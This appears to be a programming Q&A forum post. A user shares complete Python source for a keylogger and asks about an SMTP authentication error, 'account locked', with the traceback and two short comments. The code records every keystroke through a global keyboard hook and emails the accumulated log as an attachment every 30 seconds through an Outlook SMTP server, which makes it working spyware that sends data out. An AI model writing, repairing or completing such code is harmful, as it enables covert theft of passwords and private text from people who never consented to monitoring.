# Trying to create a Keylogger Project but encountering SMTP authentication error

Tags: python

```
import keyboard
import smtplib
import threading
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication

with open('log.txt', 'w') as f:
    pass

class Keylogger:
    def __init__(self, interval, email, password):
        self.interval = interval
        self.email = 'myemail@gmail.com'
        self.password = 'myapppassword'
        self.log = ""
        self.timer = threading.Timer(interval=self.interval, function=self.report)
        self.prepare_mail()

    def prepare_mail(self):
        self.msg = MIMEMultipart()
        self.msg['From'] = self.email
        self.msg['To'] = self.email
        self.msg['Subject'] = 'Keylogger report'
        self.attachment = MIMEApplication(open('log.txt', 'rb').read(), _subtype='txt')
        self.attachment.add_header('Content-Disposition', 'attachment', filename='log.txt')
        self.msg.attach(self.attachment)

    def send_mail(self):
        with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
            server.starttls()
            server.login(self.email, self.password)
            server.sendmail(self.email, self.email, self.msg.as_string())

    def start(self):
        keyboard.on_release(callback=self.callback)
        self.timer.start()

    def callback(self, event):
        if event.name == "enter":
            self.log += "\n"
        elif event.name == "space":
            self.log += " "
        elif len(event.name) > 1:
            self.log += f"[{event.name.upper()}]"
        else:
            self.log += event.name

    def report(self):
        if self.log:
            with open('log.txt', 'a') as f:
                f.write(self.log)
            self.prepare_mail()
            self.send_mail()
        self.log = ""
        self.timer = threading.Timer(interval=self.interval, function=self.report)
        self.timer.start()

if __name__ == "__main__":
    keylogger = Keylogger(interval=30, email="myemail@gmail.com", password="myapppassword")
    keylogger.start()
```

> I am getting some error 
>  I dont know how to fix it.
> **I had replaced my email and app password while running I have hid it for security purposes in this post**
> Exception in thread Thread-1: Traceback (most recent call last):
> File
> "C:\Users\Althaf\AppData\Local\Programs\Python\Python311\Lib\threading.py",
> line 1038, in _bootstrap_inner
> self.run()   File "C:\Users\Althaf\AppData\Local\Programs\Python\Python311\Lib\threading.py",
> line 1394, in run
> self.function(*self.args, **self.kwargs)   File "C:\Users\Althaf\Desktop\keyylogger.py", line 53, in report
> self.send_mail()   File "C:\Users\Althaf\Desktop\keyylogger.py", line 31, in send_mail
> server.login(self.email, self.password)   File "C:\Users\Althaf\AppData\Local\Programs\Python\Python311\Lib\smtplib.py",
> line 750, in login
> raise last_exception   File "C:\Users\Althaf\AppData\Local\Programs\Python\Python311\Lib\smtplib.py",
> line 739, in login
> (code, resp) = self.auth(
> ^^^^^^^^^^   File "C:\Users\Althaf\AppData\Local\Programs\Python\Python311\Lib\smtplib.py",
> line 662, in auth
> raise SMTPAuthenticationError(code, resp) smtplib.SMTPAuthenticationError: (535, b'5.7.139 Authentication
> unsuccessful, account locked. Contact your administrator.
> [BM1PR01CA0158.INDPRD01.PROD.OUTLOOK.COM 2023-03-07T17:10:27.843Z
> 08DB1E8F8CC0635E]')

Comment: So...you can't send emails based on this "SMTPAuthenticationError" you're getting.  Sounds like you need to contact your administrator.

Comment: Its my own personal email and password.